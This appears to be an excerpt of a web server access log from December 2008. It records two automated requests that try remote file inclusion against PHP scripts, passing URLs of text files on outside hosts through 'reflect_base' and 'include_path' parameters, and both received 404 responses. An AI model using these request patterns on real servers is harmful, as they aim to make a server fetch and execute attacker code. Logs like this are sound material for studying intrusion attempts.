89.36.39.203 - - [08/Dec/2008:11:17:59 -0800] "GET /logs/access_081126.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.csctillay.fr/UserFiles/Image/newid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.102.10.26 - - [08/Dec/2008:11:18:08 -0800] "GET /logs/access_080305.log//admin.php?include_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
